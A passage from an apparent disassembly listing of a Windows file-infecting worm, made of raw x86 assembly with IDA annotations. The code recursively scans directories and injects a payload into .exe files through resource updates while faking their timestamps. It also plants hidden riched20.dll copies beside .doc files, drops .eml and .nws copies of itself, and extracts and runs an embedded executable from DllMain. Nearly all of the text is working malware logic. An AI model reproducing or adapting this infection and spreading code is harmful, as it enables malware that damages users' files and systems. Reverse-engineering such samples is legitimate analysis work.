ebx, ds:CloseHandle 36173CB8 call ebx ; CloseHandle 36173CBA push ebp 36173CBB mov ebp, [esp+46Ch+var_440] 36173CBF push ebp 36173CC0 push edi 36173CC1 push 66h 36173CC3 push 0Ah 36173CC5 push [esp+47Ch+var_434] 36173CC9 call esi ; UpdateResourceA 36173CCB test eax, eax 36173CCD jnz short loc_36173CDD 36173CCF lea eax, [esp+468h+var_40C] 36173CD3 push eax 36173CD4 call ds:DeleteFileA 36173CDA push ebp 36173CDB jmp short loc_36173CAD 36173CDD ; ─────────────────────────────────────────────────────────────────────────── 36173CDD 36173CDD loc_36173CDD: ; CODE XREF: sub_36173878+455j 36173CDD xor edi, edi 36173CDF push edi 36173CE0 push [esp+46Ch+var_434] 36173CE4 call ds:EndUpdateResourceA 36173CEA test eax, eax 36173CEC jnz short loc_36173D0E 36173CEE lea eax, [esp+468h+var_40C] 36173CF2 push eax 36173CF3 call ds:DeleteFileA 36173CF9 push ebp 36173CFA push edi 36173CFB 36173CFB loc_36173CFB: ; CODE XREF: sub_36173878+437j 36173CFB push dword_3617ACB4 36173D01 call dword_3617AC70 36173D07 36173D07 loc_36173D07: ; CODE XREF: sub_36173878+3Fj 36173D07 ; sub_36173878+58j ... 36173D07 xor eax, eax 36173D09 jmp loc_36173DC4 36173D0E ; ─────────────────────────────────────────────────────────────────────────── 36173D0E 36173D0E loc_36173D0E: ; CODE XREF: sub_36173878+474j 36173D0E push ebp 36173D0F push edi 36173D10 push dword_3617ACB4 36173D16 call dword_3617AC70 36173D1C mov esi, [esp+474h+var_14] 36173D23 push edi 36173D24 push edi 36173D25 push 3 36173D27 push edi 36173D28 push 1 36173D2A push 80000000h 36173D2F push esi 36173D30 call ds:CreateFileA 36173D36 mov ebp, eax 36173D38 cmp ebp, 0FFFFFFFFh 36173D3B jz short loc_36173DB7 36173D3D lea eax, [esp+474h+var_420] 36173D41 push eax 36173D42 lea eax, [esp+478h+var_430] 36173D46 push eax 36173D47 lea eax, [esp+47Ch+var_428] 36173D4B push eax 36173D4C push ebp 36173D4D call ds:GetFileTime 36173D53 push ebp 36173D54 call ebx ; CloseHandle 36173D56 push edi 36173D57 push edi 36173D58 push 3 36173D5A push edi 36173D5B push edi 36173D5C lea eax, [esp+478h+var_408] 36173D60 push 40000000h 36173D65 push eax 36173D66 call ds:CreateFileA 36173D6C mov ebp, eax 36173D6E cmp ebp, 0FFFFFFFFh 36173D71 jz short loc_36173DB7 36173D73 lea eax, [esp+464h+var_410] 36173D77 push eax 36173D78 lea eax, [esp+468h+var_420] 36173D7C push eax 36173D7D lea eax, [esp+46Ch+var_418] 36173D81 push eax 36173D82 push ebp 36173D83 call ds:SetFileTime 36173D89 push ebp 36173D8A call ebx ; CloseHandle 36173D8C push esi 36173D8D call ds:GetFileAttributesA 36173D93 mov ebx, ds:SetFileAttributesA 36173D99 push 80h 36173D9E push esi 36173D9F mov ebp, eax 36173DA1 call ebx ; SetFileAttributesA 36173DA3 push edi 36173DA4 lea eax, [esp+46Ch+var_40C] 36173DA8 push esi 36173DA9 push eax 36173DAA call ds:CopyFileA 36173DB0 push ebp 36173DB1 push esi 36173DB2 call ebx ; SetFileAttributesA 36173DB4 push 1 36173DB6 pop edi 36173DB7 36173DB7 loc_36173DB7: ; CODE XREF: sub_36173878+145j 36173DB7 ; sub_36173878+16Aj ... 36173DB7 lea eax, [esp+468h+var_40C] 36173DBB push eax 36173DBC call ds:DeleteFileA 36173DC2 mov eax, edi 36173DC4 36173DC4 loc_36173DC4: ; CODE XREF: sub_36173878+491j 36173DC4 pop edi 36173DC5 pop esi 36173DC6 pop ebp 36173DC7 pop ebx 36173DC8 add esp, 44Ch 36173DCE retn 36173DCE sub_36173878 endp ; sp = -0Ch 36173DCE 36173DCF 36173DCF ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36173DCF 36173DCF ; Attributes: bp-based frame 36173DCF 36173DCF sub_36173DCF proc near ; CODE XREF: sub_36173DCF+108p 36173DCF ; sub_36173DCF+2D4p ... 36173DCF 36173DCF var_16C = dword ptr -16Ch 36173DCF var_150 = byte ptr -150h 36173DCF var_128 = byte ptr -128h 36173DCF var_124 = byte ptr -124h 36173DCF var_10 = dword ptr -10h 36173DCF var_C = dword ptr -0Ch 36173DCF var_8 = dword ptr -8 36173DCF var_4 = dword ptr -4 36173DCF arg_0 = dword ptr 8 36173DCF 36173DCF push ebp 36173DD0 mov ebp, esp 36173DD2 sub esp, 150h 36173DD8 push ebx 36173DD9 push esi 36173DDA mov esi, 400h 36173DDF push edi 36173DE0 push esi 36173DE1 push 8 36173DE3 push dword_3617ACB4 36173DE9 xor edi, edi 36173DEB mov [ebp+var_C], edi 36173DEE mov [ebp+var_4], edi 36173DF1 mov [ebp+var_8], edi 36173DF4 call dword_3617AC74 36173DFA mov ebx, eax 36173DFC cmp ebx, edi 36173DFE jnz short loc_36173E07 36173E00 xor eax, eax 36173E02 jmp loc_36174120 36173E07 ; ─────────────────────────────────────────────────────────────────────────── 36173E07 36173E07 loc_36173E07: ; CODE XREF: sub_36173DCF+2Fj 36173E07 push esi 36173E08 push [ebp+arg_0] 36173E0B push ebx 36173E0C call ds:strncpy 36173E12 push ebx 36173E13 call sub_3617186E 36173E18 push [ebp+arg_0] 36173E1B call _strlen 36173E20 mov edi, ds:strncat 36173E26 mov ecx, esi 36173E28 sub ecx, eax 36173E2A push ecx 36173E2B push offset a_ ; "\\*.*" 36173E30 push ebx 36173E31 call edi ; strncat 36173E33 add esp, 20h 36173E36 lea eax, [ebp+var_150] 36173E3C push eax 36173E3D push ebx 36173E3E call ds:FindFirstFileA 36173E44 cmp eax, 0FFFFFFFFh 36173E47 mov [ebp+var_10], eax 36173E4A jnz short loc_36173E60 36173E4C push ebx 36173E4D push 0 36173E4F push dword_3617ACB4 36173E55 call dword_3617AC70 36173E5B jmp loc_3617411D 36173E60 ; ─────────────────────────────────────────────────────────────────────────── 36173E60 36173E60 loc_36173E60: ; CODE XREF: sub_36173DCF+7Bj 36173E60 lea eax, [ebp+var_124] 36173E66 push eax 36173E67 call ds:_strlwr 36173E6D lea eax, [ebp+var_124] 36173E73 mov [esp+16Ch+var_16C], offset dot ; "." 36173E7A push eax 36173E7B call _strcmp 36173E80 pop ecx 36173E81 test eax, eax 36173E83 pop ecx 36173E84 jz loc_3617400D 36173E8A lea eax, [ebp+var_124] 36173E90 push offset a__ ; ".." 36173E95 push eax 36173E96 call _strcmp 36173E9B pop ecx 36173E9C test eax, eax 36173E9E pop ecx 36173E9F jz loc_3617400D 36173EA5 test [ebp+var_150], 10h 36173EAC jz short loc_36173EE4 36173EAE push ebx 36173EAF call _strlen 36173EB4 mov ecx, esi 36173EB6 sub ecx, eax 36173EB8 push ecx 36173EB9 push offset asc_36179474 ; "\\" 36173EBE push ebx 36173EBF call edi ; strncat 36173EC1 push ebx 36173EC2 call _strlen 36173EC7 mov ecx, esi 36173EC9 sub ecx, eax 36173ECB lea eax, [ebp+var_124] 36173ED1 push ecx 36173ED2 push eax 36173ED3 push ebx 36173ED4 call edi ; strncat 36173ED6 push ebx 36173ED7 call sub_36173DCF 36173EDC add esp, 24h 36173EDF jmp loc_3617400D 36173EE4 ; ─────────────────────────────────────────────────────────────────────────── 36173EE4 36173EE4 loc_36173EE4: ; CODE XREF: sub_36173DCF+DDj 36173EE4 ; sub_36173DCF+29Aj 36173EE4 lea eax, [ebp+var_124] 36173EEA push eax 36173EEB call _strlen 36173EF0 cmp eax, 4 36173EF3 pop ecx 36173EF4 jbe loc_3617400D 36173EFA lea eax, [ebp+var_124] 36173F00 push offset dot_exe ; ".exe" 36173F05 push eax 36173F06 call _strlen 36173F0B pop ecx 36173F0C lea eax, [ebp+eax+var_128] 36173F13 push eax 36173F14 call _strcmp 36173F19 pop ecx 36173F1A test eax, eax 36173F1C pop ecx 36173F1D jnz short loc_36173F6E 36173F1F push esi 36173F20 push [ebp+arg_0] 36173F23 push ebx 36173F24 call ds:strncpy 36173F2A push ebx 36173F2B call _strlen 36173F30 mov ecx, esi 36173F32 sub ecx, eax 36173F34 push ecx 36173F35 push offset asc_36179474 ; "\\" 36173F3A push ebx 36173F3B call edi ; strncat 36173F3D push ebx 36173F3E call _strlen 36173F43 mov ecx, esi 36173F45 sub ecx, eax 36173F47 lea eax, [ebp+var_124] 36173F4D push ecx 36173F4E push eax 36173F4F push ebx 36173F50 call edi ; strncat 36173F52 add esp, 2Ch 36173F55 cmp dword_3617ACB0, 0 36173F5C jz loc_3617400D 36173F62 push ebx 36173F63 call sub_36173878 36173F68 pop ecx 36173F69 jmp loc_3617400D 36173F6E ; ─────────────────────────────────────────────────────────────────────────── 36173F6E 36173F6E loc_36173F6E: ; CODE XREF: sub_36173DCF+14Ej 36173F6E lea eax, [ebp+var_124] 36173F74 push offset dot_doc ; ".doc" 36173F79 push eax 36173F7A call _strlen 36173F7F pop ecx 36173F80 lea eax, [ebp+eax+var_128] 36173F87 push eax 36173F88 call _strcmp 36173F8D pop ecx 36173F8E test eax, eax 36173F90 pop ecx 36173F91 jnz short loc_36173F9C 36173F93 mov [ebp+var_C], 1 36173F9A jmp short loc_3617400D 36173F9C ; ─────────────────────────────────────────────────────────────────────────── 36173F9C 36173F9C loc_36173F9C: ; CODE XREF: sub_36173DCF+1C2j 36173F9C lea eax, [ebp+var_124] 36173FA2 push offset dot_eml ; ".eml" 36173FA7 push eax 36173FA8 call _strlen 36173FAD pop ecx 36173FAE lea eax, [ebp+eax+var_128] 36173FB5 push eax 36173FB6 call _strcmp 36173FBB pop ecx 36173FBC test eax, eax 36173FBE pop ecx 36173FBF jz short loc_36173FE6 36173FC1 lea eax, [ebp+var_124] 36173FC7 push offset dot_nws ; ".nws" 36173FCC push eax 36173FCD call _strlen 36173FD2 pop ecx 36173FD3 lea eax, [ebp+eax+var_128] 36173FDA push eax 36173FDB call _strcmp 36173FE0 pop ecx 36173FE1 test eax, eax 36173FE3 pop ecx 36173FE4 jnz short loc_36173FEF 36173FE6 36173FE6 loc_36173FE6: ; CODE XREF: sub_36173DCF+1F0j 36173FE6 mov [ebp+var_4], 1 36173FED jmp short loc_3617400D 36173FEF ; ─────────────────────────────────────────────────────────────────────────── 36173FEF 36173FEF loc_36173FEF: ; CODE XREF: sub_36173DCF+215j 36173FEF lea eax, [ebp+var_124] 36173FF5 push offset RICHED20_DLL ; "riched20.dll" 36173FFA push eax 36173FFB call _strcmp 36174000 pop ecx 36174001 test eax, eax 36174003 pop ecx 36174004 jnz short loc_3617400D 36174006 mov [ebp+var_8], 1 3617400D 3617400D loc_3617400D: ; CODE XREF: sub_36173DCF+B5j 3617400D ; sub_36173DCF+D0j ... 3617400D lea eax, [ebp+var_150] 36174013 push eax 36174014 push [ebp+var_10] 36174017 call ds:FindNextFileA 3617401D test eax, eax 3617401F jz loc_361740B0 36174025 lea eax, [ebp+var_124] 3617402B push eax 3617402C call ds:_strlwr 36174032 lea eax, [ebp+var_124] 36174038 mov [esp+16Ch+var_16C], offset dot ; "." 3617403F push eax 36174040 call _strcmp 36174045 pop ecx 36174046 test eax, eax 36174048 pop ecx 36174049 jz short loc_3617400D 3617404B lea eax, [ebp+var_124] 36174051 push offset a__ ; ".." 36174056 push eax 36174057 call _strcmp 3617405C pop ecx 3617405D test eax, eax 3617405F pop ecx 36174060 jz short loc_3617400D 36174062 test [ebp+var_150], 10h 36174069 jz loc_36173EE4 3617406F push esi 36174070 push [ebp+arg_0] 36174073 push ebx 36174074 call ds:strncpy 3617407A push ebx 3617407B call _strlen 36174080 mov ecx, esi 36174082 sub ecx, eax 36174084 push ecx 36174085 push offset asc_36179474 ; "\\" 3617408A push ebx 3617408B call edi ; strncat 3617408D push ebx 3617408E call _strlen 36174093 mov ecx, esi 36174095 sub ecx, eax 36174097 lea eax, [ebp+var_124] 3617409D push ecx 3617409E push eax 3617409F push ebx 361740A0 call edi ; strncat 361740A2 push ebx 361740A3 call sub_36173DCF 361740A8 add esp, 30h 361740AB jmp loc_3617400D 361740B0 ; ─────────────────────────────────────────────────────────────────────────── 361740B0 361740B0 loc_361740B0: ; CODE XREF: sub_36173DCF+250j 361740B0 push [ebp+var_10] 361740B3 call ds:FindClose 361740B9 xor esi, esi 361740BB push ebx 361740BC push esi 361740BD push dword_3617ACB4 361740C3 call dword_3617AC70 361740C9 cmp dword_3617ACB0, esi 361740CF jz short loc_361740FB 361740D1 cmp [ebp+var_C], 1 361740D5 jnz short loc_361740EC 361740D7 cmp [ebp+var_8], esi 361740DA push [ebp+arg_0] 361740DD jnz short loc_361740E6 361740DF call sub_3617430F 361740E4 jmp short loc_361740EB 361740E6 ; ─────────────────────────────────────────────────────────────────────────── 361740E6 361740E6 loc_361740E6: ; CODE XREF: sub_36173DCF+30Ej 361740E6 call sub_3617442D 361740EB 361740EB loc_361740EB: ; CODE XREF: sub_36173DCF+315j 361740EB pop ecx 361740EC 361740EC loc_361740EC: ; CODE XREF: sub_36173DCF+306j 361740EC cmp [ebp+var_4], esi 361740EF push [ebp+arg_0] 361740F2 jz short loc_36174117 361740F4 call sub_3617455C 361740F9 jmp short loc_3617411C 361740FB ; ─────────────────────────────────────────────────────────────────────────── 361740FB 361740FB loc_361740FB: ; CODE XREF: sub_36173DCF+300j 361740FB cmp [ebp+var_C], 1 361740FF jnz short loc_3617410F 36174101 cmp [ebp+var_8], esi 36174104 jnz short loc_3617410F 36174106 push [ebp+arg_0] 36174109 call sub_3617430F 3617410E pop ecx 3617410F 3617410F loc_3617410F: ; CODE XREF: sub_36173DCF+330j 3617410F ; sub_36173DCF+335j 3617410F cmp [ebp+var_4], esi 36174112 jnz short loc_3617411D 36174114 push [ebp+arg_0] 36174117 36174117 loc_36174117: ; CODE XREF: sub_36173DCF+323j 36174117 call sub_36174374 3617411C 3617411C loc_3617411C: ; CODE XREF: sub_36173DCF+32Aj 3617411C pop ecx 3617411D 3617411D loc_3617411D: ; CODE XREF: sub_36173DCF+8Cj 3617411D ; sub_36173DCF+343j 3617411D push 1 3617411F pop eax 36174120 36174120 loc_36174120: ; CODE XREF: sub_36173DCF+33j 36174120 pop edi 36174121 pop esi 36174122 pop ebx 36174123 leave 36174124 retn 36174124 sub_36173DCF endp 36174124 36174125 36174125 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36174125 36174125 ; Attributes: bp-based frame 36174125 36174125 sub_36174125 proc near ; CODE XREF: _DllMain@12+C8p 36174125 36174125 var_C64 = byte ptr -0C64h 36174125 var_864 = byte ptr -864h 36174125 var_861 = byte ptr -861h 36174125 var_464 = byte ptr -464h 36174125 var_64 = dword ptr -64h 36174125 var_34 = word ptr -34h 36174125 var_20 = byte ptr -20h 36174125 var_10 = byte ptr -10h 36174125 var_C = dword ptr -0Ch 36174125 var_8 = dword ptr -8 36174125 var_4 = dword ptr -4 36174125 36174125 push ebp 36174126 mov ebp, esp 36174128 sub esp, 0C64h 3617412E push ebx 3617412F push esi 36174130 push edi 36174131 push offset aDontrunold ; "dontrunold" 36174136 push offset byte_3617CCB8 3617413B call ds:strstr 36174141 pop ecx 36174142 test eax, eax 36174144 pop ecx 36174145 jnz loc_36174245 3617414B xor ebx, ebx 3617414D push 2 3617414F push ebx 36174150 push offset byte_3617C0B8 36174155 call ds:LoadLibraryExA 3617415B mov edi, eax 3617415D push 0Ah 3617415F push 66h 36174161 push edi 36174162 call ds:FindResourceA 36174168 push eax 36174169 push edi 3617416A mov [ebp+var_4], eax 3617416D call ds:LoadResource 36174173 push eax 36174174 call ds:LockResource 3617417A push [ebp+var_4] 3617417D mov esi, ds:SizeofResource 36174183 mov [ebp+var_C], eax 36174186 push edi 36174187 call esi ; SizeofResource 36174189 cmp eax, 64h 3617418C jb loc_3617423E 36174192 lea eax, [ebp+var_864] 36174198 push offset byte_3617C0B8 3617419D push eax 3617419E call _strcpy 361741A3 pop ecx 361741A4 lea eax, [ebp+var_864] 361741AA pop ecx 361741AB mov [ebp+var_861], bl 361741B1 push eax 361741B2 call ds:GetDriveTypeA 361741B8 cmp eax, 3 361741BB jnz short loc_36174222 361741BD lea eax, [ebp+var_C64] 361741C3 push offset byte_3617B8B8 361741C8 push eax 361741C9 call _strcpy 361741CE lea eax, [ebp+var_464] 361741D4 push offset byte_3617BCB8 361741D9 push eax 361741DA call _strcpy 361741DF lea eax, [ebp+var_C64] 361741E5 push 2Eh 361741E7 push eax 361741E8 call ds:strchr 361741EE push offset spacedot_exe ; " .exe" 361741F3 push eax 361741F4 call _strcpy 361741F9 lea eax, [ebp+var_464] 361741FF push offset asc_36179474 ; "\\" 36174204 push eax 36174205 call _strcat 3617420A lea eax, [ebp+var_C64] 36174210 push eax 36174211 lea eax, [ebp+var_464] 36174217 push eax 36174218 call _strcat 3617421D add esp, 30h 36174220 jmp short loc_3617426C 36174222 ; ─────────────────────────────────────────────────────────────────────────── 36174222 36174222 loc_36174222: ; CODE XREF: sub_36174125+96j 36174222 lea eax, [ebp+var_464] 36174228 push eax 36174229 push ebx 3617422A push offset mep ; "mep" 3617422F push offset byte_3617B4B8 36174234 call ds:GetTempFileNameA 3617423A test eax, eax 3617423C jnz short loc_3617424C 3617423E 3617423E loc_3617423E: ; CODE XREF: sub_36174125+67j 3617423E push edi 3617423F call ds:FreeLibrary 36174245 36174245 loc_36174245: ; CODE XREF: sub_36174125+20j 36174245 xor eax, eax 36174247 jmp loc_3617430A 3617424C ; ─────────────────────────────────────────────────────────────────────────── 3617424C 3617424C loc_3617424C: ; CODE XREF: sub_36174125+117j 3617424C lea eax, [ebp+var_464] 36174252 push eax 36174253 call ds:DeleteFileA 36174259 lea eax, [ebp+var_464] 3617425F push offset dot_exe ; ".exe" 36174264 push eax 36174265 call _strcat 3617426A pop ecx 3617426B pop ecx 3617426C 3617426C loc_3617426C: ; CODE XREF: sub_36174125+FBj 3617426C push ebx 3617426D push 26h 3617426F push 2 36174271 push ebx 36174272 push ebx 36174273 lea eax, [ebp+var_464] 36174279 push 40000000h 3617427E push eax 3617427F call ds:CreateFileA 36174285 mov [ebp+var_8], eax 36174288 lea eax, [ebp+var_10] 3617428B push ebx 3617428C push eax 3617428D push [ebp+var_4] 36174290 push edi 36174291 call esi ; SizeofResource 36174293 push eax 36174294 push [ebp+var_C] 36174297 push [ebp+var_8] 3617429A call ds:WriteFile 361742A0 push [ebp+var_8] 361742A3 call ds:CloseHandle 361742A9 push edi 361742AA call ds:FreeLibrary 361742B0 push 44h 361742B2 lea eax, [ebp+var_64] 361742B5 pop esi 361742B6 push esi 361742B7 push ebx 361742B8 push eax 361742B9 call _memset 361742BE push 10h 361742C0 lea eax, [ebp+var_20] 361742C3 push ebx 361742C4 push eax 361742C5 call _memset 361742CA add esp, 18h 361742CD lea eax, [ebp+var_20] 361742D0 mov [ebp+var_64], esi 361742D3 mov [ebp+var_34], 0Ah 361742D9 push eax 361742DA lea eax, [ebp+var_64] 361742DD push eax 361742DE push offset byte_3617D0B8 361742E3 push ebx 361742E4 push ebx 361742E5 push ebx 361742E6 push ebx 361742E7 push ebx 361742E8 lea eax, [ebp+var_464] 361742EE push offset byte_3617CCB8 361742F3 push eax 361742F4 call ds:CreateProcessA 361742FA lea eax, [ebp+var_464] 36174300 push eax 36174301 call sub_36171899 36174306 pop ecx 36174307 push 1 36174309 pop eax 3617430A 3617430A loc_3617430A: ; CODE XREF: sub_36174125+122j 3617430A pop edi 3617430B pop esi 3617430C pop ebx 3617430D leave 3617430E retn 3617430E sub_36174125 endp 3617430E 3617430F 3617430F ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617430F 3617430F ; Attributes: bp-based frame 3617430F 3617430F sub_3617430F proc near ; CODE XREF: sub_36173DCF+310p 3617430F ; sub_36173DCF+33Ap ... 3617430F 3617430F var_400 = byte ptr -400h 3617430F arg_0 = dword ptr 8 3617430F 3617430F push ebp 36174310 mov ebp, esp 36174312 sub esp, 400h 36174318 push [ebp+arg_0] 3617431B lea eax, [ebp+var_400] 36174321 push eax 36174322 call _strcpy 36174327 lea eax, [ebp+var_400] 3617432D push offset asc_36179474 ; "\\" 36174332 push eax 36174333 call _strcat 36174338 lea eax, [ebp+var_400] 3617433E push offset RICHED20_DLL ; "riched20.dll" 36174343 push eax 36174344 call _strcat 36174349 add esp, 18h 3617434C lea eax, [ebp+var_400] 36174352 push 0 36174354 push eax 36174355 push offset byte_3617C4B8 3617435A call ds:CopyFileA 36174360 lea eax, [ebp+var_400] 36174366 push 26h 36174368 push eax 36174369 call ds:SetFileAttributesA 3617436F push 1 36174371 pop eax 36174372 leave 36174373 retn 36174373 sub_3617430F endp 36174373 36174374 36174374 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36174374 36174374 ; Attributes: bp-based frame 36174374 36174374 sub_36174374 proc near ; CODE XREF: sub_36173DCF+348p 36174374 ; sub_3617455C+240p 36174374 36174374 var_400 = byte ptr -400h 36174374 arg_0 = dword ptr 8 36174374 36174374 push ebp 36174375 mov ebp, esp 36174377 sub esp, 400h 3617437D push esi 3617437E call sub_36171A7B 36174383 mov esi, offset byte_3617A818 36174388 push 2Eh 3617438A push esi 3617438B call ds:strchr 36174391 pop ecx 36174392 test eax, eax 36174394 pop ecx 36174395 jz short loc_3617439A 36174397 and byte ptr [eax], 0 3617439A 3617439A loc_3617439A: ; CODE XREF: sub_36174374+21j 3617439A push 400h 3617439F lea eax, [ebp+var_400] 361743A5 push [ebp+arg_0] 361743A8 push eax 361743A9 call ds:strncpy 361743AF lea eax, [ebp+var_400] 361743B5 push offset asc_36179474 ; "\\" 361743BA push eax 361743BB call _strcat 361743C0 lea eax, [ebp+var_400] 361743C6 push esi 361743C7 push eax 361743C8 call _strcat 361743CD add esp, 1Ch 361743D0 call ds:rand 361743D6 imul eax, 64h 361743D9 cdq 361743DA mov ecx, 7FFFh 361743DF pop esi 361743E0 idiv ecx 361743E2 inc eax 361743E3 cmp eax, 5Fh 361743E6 jle short use_eml_ext 361743E8 push offset dot_nws ; ".nws" 361743ED jmp short loc_361743F4 361743EF ; ─────────────────────────────────────────────────────────────────────────── 361743EF 361743EF use_eml_ext: ; CODE XREF: sub_36174374+72j 361743EF push offset dot_eml ; ".eml" 361743F4 361743F4 loc_361743F4: ; CODE XREF: sub_36174374+79j 361743F4 lea eax, [ebp+var_400] 361743FA push eax 361743FB call _strcat 36174400 pop ecx 36174401 lea eax, [ebp+var_400] 36174407 pop ecx 36174408 push 0 3617440A push eax 3617440B push offset byte_3617C8B8 36174410 call ds:CopyFileA 36174416 lea eax, [ebp+var_400] 3617441C push 80h 36174421 push eax 36174422 call ds:SetFileAttributesA 36174428 push 1 3617442A pop eax 3617442B leave 3617442C retn 3617442C sub_36174374 endp 3617442C 3617442D 3617442D ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617442D 3617442D ; Attributes: bp-based frame 3617442D 3617442D sub_3617442D proc near ; CODE XREF: sub_36173DCF+317p 3617442D 3617442D var_8 = dword ptr -8 3617442D var_4 = dword ptr -4 3617442D arg_0 = dword ptr 8 3617442D 3617442D push ebp 3617442E mov ebp, esp 36174430 push ecx 36174431 push ecx 36174432 push ebx 36174433 push esi 36174434 xor esi, esi 36174436 push edi 36174437 mov edi, ds:CreateFileA 3617443D push esi 3617443E push esi 3617443F push 3 36174441 push esi 36174442 mov ebx, 80000000h 36174447 push 7 36174449 push ebx 3617444A push offset byte_3617C4B8 3617444F call edi ; CreateFileA 36174451 cmp eax, 0FFFFFFFFh 36174454 mov [ebp+var_4], eax 36174457 jz loc_36174506 3617445D push esi 3617445E push eax 3617445F call ds:GetFileSize 36174465 push [ebp+var_4] 36174468 cmp eax, 0FFFFFFFFh 3617446B mov [ebp+var_8], eax 3617446E jz loc_36174500 36174474 call ds:CloseHandle 3617447A push 400h 3617447F push 8 36174481 push dword_3617ACB4 36174487 call dword_3617AC74 3617448D push [ebp+arg_0] 36174490 cmp eax, esi 36174492 mov [ebp+var_4], eax 36174495 jz short loc_36174509 36174497 push eax 36174498 call _strcpy 3617449D push offset asc_36179474 ; "\\" 361744A2 push [ebp+var_4] 361744A5 call _strcat 361744AA push offset RICHED20_DLL ; "riched20.dll" 361744AF push [ebp+var_4] 361744B2 call _strcat 361744B7 add esp, 18h 361744BA push esi 361744BB push esi 361744BC push 3 361744BE push esi 361744BF push 7 361744C1 push ebx 361744C2 push [ebp+var_4] 361744C5 call edi ; CreateFileA 361744C7 mov edi, eax 361744C9 cmp edi, 0FFFFFFFFh 361744CC jnz short loc_361744E0 361744CE push [ebp+var_4] 361744D1 push esi 361744D2 push dword_3617ACB4 361744D8 call dword_3617AC70 361744DE jmp short loc_36174506 361744E0 ; ─────────────────────────────────────────────────────────────────────────── 361744E0 361744E0 loc_361744E0: ; CODE XREF: sub_3617442D+9Fj 361744E0 push esi 361744E1 push edi 361744E2 call ds:GetFileSize 361744E8 mov ebx, eax 361744EA cmp ebx, 0FFFFFFFFh 361744ED jnz short loc_36174513 361744EF push [ebp+var_4] 361744F2 push esi 361744F3 push dword_3617ACB4 361744F9 call dword_3617AC70 361744FF push edi 36174500 36174500 loc_36174500: ; CODE XREF: sub_3617442D+41j 36174500 call ds:CloseHandle 36174506 36174506 loc_36174506: ; CODE XREF: sub_3617442D+2Aj 36174506 ; sub_3617442D+B1j 36174506 push [ebp+arg_0] 36174509 36174509 loc_36174509: ; CODE XREF: sub_3617442D+68j 36174509 call sub_3617430F 3617450E pop ecx 3617450F xor eax, eax 36174511 jmp short loc_36174557 36174513 ; ─────────────────────────────────────────────────────────────────────────── 36174513 36174513 loc_36174513: ; CODE XREF: sub_3617442D+C0j 36174513 push edi 36174514 call ds:CloseHandle 3617451A mov eax, [ebp+var_8] 3617451D add eax, 1Eh 36174520 cmp eax, ebx 36174522 jnb short loc_36174544 36174524 push 80h 36174529 push [ebp+var_4] 3617452C call ds:SetFileAttributesA 36174532 push [ebp+var_4] 36174535 call ds:DeleteFileA 3617453B push [ebp+arg_0] 3617453E call sub_3617430F 36174543 pop ecx 36174544 36174544 loc_36174544: ; CODE XREF: sub_3617442D+F5j 36174544 push [ebp+var_4] 36174547 push esi 36174548 push dword_3617ACB4 3617454E call dword_3617AC70 36174554 push 1 36174556 pop eax 36174557 36174557 loc_36174557: ; CODE XREF: sub_3617442D+E4j 36174557 pop edi 36174558 pop esi 36174559 pop ebx 3617455A leave 3617455B retn 3617455B sub_3617442D endp 3617455B 3617455C 3617455C ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617455C 3617455C ; Attributes: bp-based frame 3617455C 3617455C sub_3617455C proc near ; CODE XREF: sub_36173DCF+325p 3617455C 3617455C var_14C = byte ptr -14Ch 3617455C var_124 = byte ptr -124h 3617455C var_120 = byte ptr -120h 3617455C var_C = dword ptr -0Ch 3617455C var_8 = dword ptr -8 3617455C var_4 = dword ptr -4 3617455C arg_0 = dword ptr 8 3617455C 3617455C push ebp 3617455D mov ebp, esp 3617455F sub esp, 14Ch 36174565 push esi 36174566 and [ebp+var_4], 0 3617456A mov esi, 400h 3617456F push edi 36174570 push esi 36174571 push 8 36174573 push dword_3617ACB4 36174579 call dword_3617AC74 3617457F mov edi, eax 36174581 test edi, edi 36174583 mov [ebp+var_C], edi 36174586 jz loc_361747A5 3617458C push esi 3617458D push [ebp+arg_0] 36174590 push edi 36174591 call ds:strncpy 36174597 push edi 36174598 call sub_3617186E 3617459D push [ebp+arg_0] 361745A0 call _strlen 361745A5 sub esi, eax 361745A7 push esi 361745A8 push offset a_ ; "\\*.*" 361745AD push edi 361745AE call ds:strncat 361745B4 add esp, 20h 361745B7 lea eax, [ebp+var_14C] 361745BD push eax 361745BE push edi 361745BF call ds:FindFirstFileA 361745C5 cmp eax, 0FFFFFFFFh 361745C8 mov [ebp+var_8], eax 361745CB jnz short loc_361745E1 361745CD push edi 361745CE push 0 361745D0 push dword_3617ACB4 361745D6 call dword_3617AC70 361745DC jmp loc_361747A2 361745E1 ; ─────────────────────────────────────────────────────────────────────────── 361745E1 361745E1 loc_361745E1: ; CODE XREF: sub_3617455C+6Fj 361745E1 mov esi, ds:_strlwr 361745E7 lea eax, [ebp+var_120] 361745ED push eax 361745EE call esi ; _strlwr 361745F0 mov edi, offset dot ; "." 361745F5 lea eax, [ebp+var_120] 361745FB push edi 361745FC push eax 361745FD call _strcmp 36174602 add esp, 0Ch 36174605 test eax, eax 36174607 jz loc_3617469D 3617460D lea eax, [ebp+var_120] 36174613 push offset a__ ; ".." 36174618 push eax 36174619 call _strcmp 3617461E pop ecx 3617461F test eax, eax 36174621 pop ecx 36174622 jz short loc_3617469D 36174624 lea eax, [ebp+var_120] 3617462A push eax 3617462B call _strlen 36174630 cmp eax, 4 36174633 pop ecx 36174634 jbe short loc_3617469D 36174636 test [ebp+var_14C], 10h 3617463D jnz short loc_3617469D 3617463F lea eax, [ebp+var_120] 36174645 push offset dot_eml ; ".eml" 3617464A push eax 3617464B call _strlen 36174650 pop ecx 36174651 lea eax, [ebp+eax+var_124] 36174658 push eax 36174659 call _strcmp 3617465E pop ecx 3617465F test eax, eax 36174661 pop ecx 36174662 jz short loc_36174689 36174664 lea eax, [ebp+var_120] 3617466A push offset dot_nws ; ".nws" 3617466F push eax 36174670 call _strlen 36174675 pop ecx 36174676 lea eax, [ebp+eax+var_124] 3617467D push eax 3617467E call _strcmp 36174683 pop ecx 36174684 test eax, eax 36174686 pop ecx 36174687 jnz short loc_3617469D 36174689 36174689 loc_36174689: ; CODE XREF: sub_3617455C+106j 36174689 lea eax, [ebp+var_120] 3617468F push eax 36174690 push [ebp+arg_0] 36174693 call sub_361747A9 36174698 pop ecx 36174699 mov [ebp+var_4], eax 3617469C pop ecx 3617469D 3617469D loc_3617469D: ; CODE XREF: sub_3617455C+ABj 3617469D ; 